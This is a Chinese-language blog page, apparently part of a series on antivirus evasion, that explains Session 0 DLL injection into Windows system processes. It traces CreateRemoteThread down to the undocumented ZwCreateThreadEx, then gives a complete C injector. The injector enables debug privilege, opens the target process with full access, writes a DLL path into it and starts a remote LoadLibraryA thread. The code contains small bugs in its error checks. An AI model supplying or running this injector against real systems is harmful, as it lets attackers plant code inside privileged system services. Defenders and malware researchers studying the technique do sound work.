<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Session注入在进行Dll注入的时候，我们发现没法注入一些系统进程 提示我们缺少权限或者拒绝访问，甚至干脆就是什么反应都没有 这时候我们考虑往更加底层去跟函数，我们不能再使用在用户层所给我们的函数，我们自己去寻找内核层的函数 跟进函数首先找到我们用DLL注入编译出来的二进制文件，看看CreateRemoteThread这个api到底是怎么调入进入0环的  搜索到这个函数的位置之后，我们可以看见">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2024/10/08/%E5%85%8D%E6%9D%80/Session%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Session注入在进行Dll注入的时候，我们发现没法注入一些系统进程 提示我们缺少权限或者拒绝访问，甚至干脆就是什么反应都没有 这时候我们考虑往更加底层去跟函数，我们不能再使用在用户层所给我们的函数，我们自己去寻找内核层的函数 跟进函数首先找到我们用DLL注入编译出来的二进制文件，看看CreateRemoteThread这个api到底是怎么调入进入0环的  搜索到这个函数的位置之后，我们可以看见">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111201711.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111248448.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111338619.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111433359.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111540902.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111629601.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111746157.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111901191.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112041033.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112115960.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112515587.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112607677.png">
<meta property="article:published_time" content="2024-10-08T03:50:54.558Z">
<meta property="article:modified_time" content="2024-09-25T03:27:01.366Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111201711.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-免杀/Session注入" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/10/08/%E5%85%8D%E6%9D%80/Session%E6%B3%A8%E5%85%A5/" class="article-date">
  <time class="dt-published" datetime="2024-10-08T03:50:54.558Z" itemprop="datePublished">2024-10-08</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="Session注入"><a href="#Session注入" class="headerlink" title="Session注入"></a>Session注入</h1><p>在进行Dll注入的时候，我们发现没法注入一些系统进程</p>
<p>提示我们缺少权限或者拒绝访问，甚至干脆就是什么反应都没有</p>
<p>这时候我们考虑往更加底层去跟函数，我们不能再使用在用户层所给我们的函数，我们自己去寻找内核层的函数</p>
<h2 id="跟进函数"><a href="#跟进函数" class="headerlink" title="跟进函数"></a>跟进函数</h2><p>首先找到我们用DLL注入编译出来的二进制文件，看看CreateRemoteThread这个api到底是怎么调入进入0环的</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111201711.png" alt="image-20240925111201711"></p>
<p>搜索到这个函数的位置之后，我们可以看见，CreateRemoteThread的引用指向了一个外部调用（<strong>粉字</strong>）</p>
<p>然后在导入表中查看，发现其来自Kernel32.dll</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111248448.png" alt="image-20240925111248448"></p>
<p>前面我们提到过，这个dll是一个相对基础的dll，在载入pdb之后，我们可以继续寻找CreateRemoteThread函数，下面的粉字意味着又是一个外部调用</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111338619.png" alt="image-20240925111338619"></p>
<p>我在自己跟这个调用的时候，发现这个api-ms-win-core-processthreads-l1-1-0.dll 库里面并没有实际的函数定义，反而是一些类似函数表头的数据结构，而且函数在导出表里面</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111433359.png" alt="image-20240925111433359"></p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111540902.png" alt="image-20240925111540902"></p>
<p>又查阅资料得知KERNEL32不一定是指kernel32.dll，在新版本中还有KernlBase.dll这个dll库和kernel32.dll库交替使用</p>
<p>在KernelBase中，果然找到了CreateRemoteThreadEx的函数</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111629601.png" alt="image-20240925111629601"></p>
<p>继续在这个函数中向下跟，在这个函数中也找到了NtCreateThreadEx的声明</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111746157.png" alt="image-20240925111746157"></p>
<p>Nt开头的函数，一看导入表，在ntdll中</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925111901191.png" alt="image-20240925111901191"></p>
<p>继续往下跟，在ntdll中找到了进入内核的入口</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112041033.png" alt="image-20240925112041033"></p>
<p>在这个入口上，我们发现了ZwCreateThread，这也是另一个调用NtCreateThreadEx的入口</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112115960.png" alt="image-20240925112115960"></p>
<p>在向系统进程注入DLL时，由于注入的是SESSION0的进程，CreateRemoteThread会调用更加底层的ZwCreateThreadEx这个函数，而ZwCreateThread第七个参数CreateThreadFlags会被置为1，<strong>导致线程创建完成后一直挂起导致无法恢复线程正常的运行</strong>，导致注入失败</p>
<p>这时候，<strong>我们可以使用更加底层的ZwCreateThread来解决这个问题</strong></p>
<p>ZwCreateThreadEx是一个未文档化的API，但是可以通过GetProcAddress来获取其地址</p>
<p>下面是这个API被逆向出来的结构</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _WIN64</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="title function_">DWORD</span><span class="params">(WINAPI* typedef_ZwCreateThreadEx)</span><span class="params">(</span></span><br><span class="line"><span class="params">PHANDLE ThreadHandle,</span></span><br><span class="line"><span class="params">ACCESS_MASK DesiredAccess,</span></span><br><span class="line"><span class="params">LPVOID ObjectAttributes,</span></span><br><span class="line"><span class="params">HANDLE ProcessHandle,</span></span><br><span class="line"><span class="params">LPTHREAD_START_ROUTINE lpStartAddress,</span></span><br><span class="line"><span class="params">LPVOID lpParameter,</span></span><br><span class="line"><span class="params">ULONG CreateThreadFlags,</span></span><br><span class="line"><span class="params">SIZE_T ZeroBits,</span></span><br><span class="line"><span class="params">SIZE_T StackSize,</span></span><br><span class="line"><span class="params">SIZE_T MaximumStackSize,</span></span><br><span class="line"><span class="params">LPVOID pUnkown)</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line"><span class="keyword">typedef</span> <span class="title function_">DWORD</span><span class="params">(WINAPI* typedef_ZwCreateThreadEx)</span><span class="params">(</span></span><br><span class="line"><span class="params">PHANDLE ThreadHandle,</span></span><br><span class="line"><span class="params">ACCESS_MASK DesiredAccess,</span></span><br><span class="line"><span class="params">LPVOID ObjectAttributes,</span></span><br><span class="line"><span class="params">HANDLE ProcessHandle,</span></span><br><span class="line"><span class="params">LPTHREAD_START_ROUTINE lpStartAddress,</span></span><br><span class="line"><span class="params">LPVOID lpParameter,</span></span><br><span class="line"><span class="params">BOOL CreateSuspended,</span></span><br><span class="line"><span class="params">DWORD dwStackSize,</span></span><br><span class="line"><span class="params">DWORD dw1,</span></span><br><span class="line"><span class="params">DWORD dw2,</span></span><br><span class="line"><span class="params">LPVOID pUnkown)</span>;</span><br></pre></td></tr></table></figure>

<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.打开注入进程，获取进程句柄</span><br><span class="line">2.在注入的进程申请内存地址</span><br><span class="line">3.写入内存地址</span><br><span class="line">4.获取LoadLibraryA函数地址</span><br><span class="line">5.加载ntdll</span><br><span class="line">6.获取ZwCreateThreadEx函数地址</span><br><span class="line">7.使用 ZwCreateThreadEx 创建远线程，实现 DLL 注入</span><br><span class="line">8.关闭句柄</span><br></pre></td></tr></table></figure>

<p>在对Session0的注入需要拿到SE_PRIVILEGE_ENABLED权限，所以代码略有不同</p>
<p><strong>普通用户</strong></p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112515587.png" alt="image-20240925112515587"></p>
<p><strong>管理员</strong></p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20240925112607677.png" alt="image-20240925112607677"></p>
<h2 id="demo（ascii）"><a href="#demo（ascii）" class="headerlink" title="demo（ascii）"></a>demo（ascii）</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// session0Inject.cpp : 此文件包含 &quot;main&quot; 函数。程序执行将在此处开始并结束。</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;tchar.h&gt;</span></span></span><br><span class="line"><span class="comment">// 提权函数</span></span><br><span class="line">BOOL <span class="title function_">EnableDebugPrivilege</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">	HANDLE hToken;</span><br><span class="line">	BOOL fOk = FALSE;</span><br><span class="line">	<span class="keyword">if</span> (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &amp;hToken))</span><br><span class="line">	&#123;</span><br><span class="line">		TOKEN_PRIVILEGES tp;</span><br><span class="line">		tp.PrivilegeCount = <span class="number">1</span>;</span><br><span class="line">		LookupPrivilegeValue(<span class="literal">NULL</span>, SE_DEBUG_NAME, &amp;tp.Privileges[<span class="number">0</span>].Luid);</span><br><span class="line">		tp.Privileges[<span class="number">0</span>].Attributes = SE_PRIVILEGE_ENABLED;</span><br><span class="line">		AdjustTokenPrivileges(hToken, FALSE, &amp;tp, <span class="keyword">sizeof</span>(tp), <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line">		fOk = (GetLastError() == ERROR_SUCCESS);</span><br><span class="line">		CloseHandle(hToken);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> fOk;</span><br><span class="line">&#125;</span><br><span class="line">BOOL <span class="title function_">ZwCreateThreadExInject</span><span class="params">(DWORD PID, <span class="type">const</span> <span class="type">char</span>* pszDllFileName)</span></span><br><span class="line">&#123;</span><br><span class="line">	EnableDebugPrivilege();</span><br><span class="line">	HANDLE hRemoteThread;</span><br><span class="line">	DWORD dwStatus = <span class="number">0</span>;</span><br><span class="line">	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);</span><br><span class="line">	<span class="keyword">if</span> (hProcess == <span class="literal">NULL</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;OpenProcess error : %d\n&quot;</span>, GetLastError());</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	SIZE_T dwSize = _tcslen(pszDllFileName) + <span class="number">1</span>;</span><br><span class="line">	LPVOID pDllAddr = VirtualAllocEx(hProcess, <span class="literal">NULL</span>, dwSize, MEM_COMMIT,</span><br><span class="line">		PAGE_READWRITE);</span><br><span class="line">	<span class="keyword">if</span> (<span class="literal">NULL</span> == pDllAddr)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;VirtualAllocEx error\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (FALSE == WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize,</span><br><span class="line">		<span class="literal">NULL</span>))</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;WriteProcessMemory error\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	HMODULE hNtdllDll = LoadLibrary(<span class="string">&quot;ntdll.dll&quot;</span>);</span><br><span class="line">	<span class="keyword">if</span> (<span class="literal">NULL</span> == hNtdllDll)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;Load ntdll.dll error\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	FARPROC pFuncProcAddr = GetProcAddress(GetModuleHandleA(<span class="string">&quot;kernel32.dll&quot;</span>),</span><br><span class="line">		<span class="string">&quot;LoadLibraryA&quot;</span>);</span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> _WIN64</span></span><br><span class="line">	<span class="keyword">typedef</span> <span class="title function_">DWORD</span><span class="params">(WINAPI* typedef_ZwCreateThreadEx)</span><span class="params">(</span></span><br><span class="line"><span class="params">		PHANDLE ThreadHandle,</span></span><br><span class="line"><span class="params">		ACCESS_MASK DesiredAccess,</span></span><br><span class="line"><span class="params">		LPVOID ObjectAttributes,</span></span><br><span class="line"><span class="params">		HANDLE ProcessHandle,</span></span><br><span class="line"><span class="params">		LPTHREAD_START_ROUTINE lpStartAddress,</span></span><br><span class="line"><span class="params">		LPVOID lpParameter,</span></span><br><span class="line"><span class="params">		ULONG CreateThreadFlags,</span></span><br><span class="line"><span class="params">		SIZE_T ZeroBits,</span></span><br><span class="line"><span class="params">		SIZE_T StackSize,</span></span><br><span class="line"><span class="params">		SIZE_T MaximumStackSize,</span></span><br><span class="line"><span class="params">		LPVOID pUnkown)</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">	<span class="keyword">typedef</span> <span class="title function_">DWORD</span><span class="params">(WINAPI* typedef_ZwCreateThreadEx)</span><span class="params">(</span></span><br><span class="line"><span class="params">		PHANDLE ThreadHandle,</span></span><br><span class="line"><span class="params">		ACCESS_MASK DesiredAccess,</span></span><br><span class="line"><span class="params">		LPVOID ObjectAttributes,</span></span><br><span class="line"><span class="params">		HANDLE ProcessHandle,</span></span><br><span class="line"><span class="params">		LPTHREAD_START_ROUTINE lpStartAddress,</span></span><br><span class="line"><span class="params">		LPVOID lpParameter,</span></span><br><span class="line"><span class="params">		BOOL CreateSuspended,</span></span><br><span class="line"><span class="params">		DWORD dwStackSize,</span></span><br><span class="line"><span class="params">		DWORD dw1,</span></span><br><span class="line"><span class="params">		DWORD dw2,</span></span><br><span class="line"><span class="params">		LPVOID pUnkown)</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">	typedef_ZwCreateThreadEx ZwCreateThreadEx =</span><br><span class="line">		(typedef_ZwCreateThreadEx)GetProcAddress(hNtdllDll, <span class="string">&quot;ZwCreateThreadEx&quot;</span>);</span><br><span class="line">	<span class="keyword">if</span> (<span class="literal">NULL</span> == ZwCreateThreadEx)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;GetProcAddress error\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	dwStatus = ZwCreateThreadEx(&amp;hRemoteThread, PROCESS_ALL_ACCESS, <span class="literal">NULL</span>,</span><br><span class="line">		hProcess,</span><br><span class="line">		(LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="literal">NULL</span>);</span><br><span class="line">	<span class="keyword">if</span> (<span class="literal">NULL</span> == ZwCreateThreadEx)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;ZwCreateThreadEx error\n&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	CloseHandle(hProcess);</span><br><span class="line">	FreeLibrary(hNtdllDll);</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">if</span> (argc == <span class="number">3</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="comment">//DWORD dwPid;</span></span><br><span class="line">		<span class="comment">//sscanf(argv[1], &quot;%d&quot;, &amp;dwPid);</span></span><br><span class="line">		BOOL bRet = ZwCreateThreadExInject((DWORD)_tstol(argv[<span class="number">1</span>]), argv[<span class="number">2</span>]);</span><br><span class="line">		<span class="comment">//BOOL bRet = ZwCreateThreadExInject(dwPid, argv[2]);</span></span><br><span class="line">		<span class="keyword">if</span> (<span class="number">-1</span> == bRet)</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;Inject dll failed\n&quot;</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">		&#123;</span><br><span class="line">			<span class="built_in">printf</span>(<span class="string">&quot;Inject dll successfully\n&quot;</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span></span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;Usage: %s PID &lt;DllPath&gt;\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;Example: %s 520 C:\\test.dll\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">		<span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/10/08/%E5%85%8D%E6%9D%80/Session%E6%B3%A8%E5%85%A5/" data-id="cm1zwlrfm0009u0v66x9z93n6" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/10/08/%E5%85%8D%E6%9D%80/SSDT%20Hook/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2024/10/08/%E5%85%8D%E6%9D%80/shellcode%20demo/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/10/">October 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/09/">September 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/10/08/%E5%85%8D%E6%9D%80/%E9%9A%90%E8%97%8F%E5%AF%BC%E5%85%A5%E8%A1%A8/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/%E5%85%8D%E6%9D%80/%E8%BF%9B%E7%A8%8B%E5%BC%BA%E6%9D%80/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/%E5%85%8D%E6%9D%80/%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/%E5%85%8D%E6%9D%80/%E8%B0%83%E8%AF%95/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/10/08/%E5%85%8D%E6%9D%80/%E7%86%B5%E4%B8%8E%E8%87%AA%E7%AD%BE%E5%90%8D/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>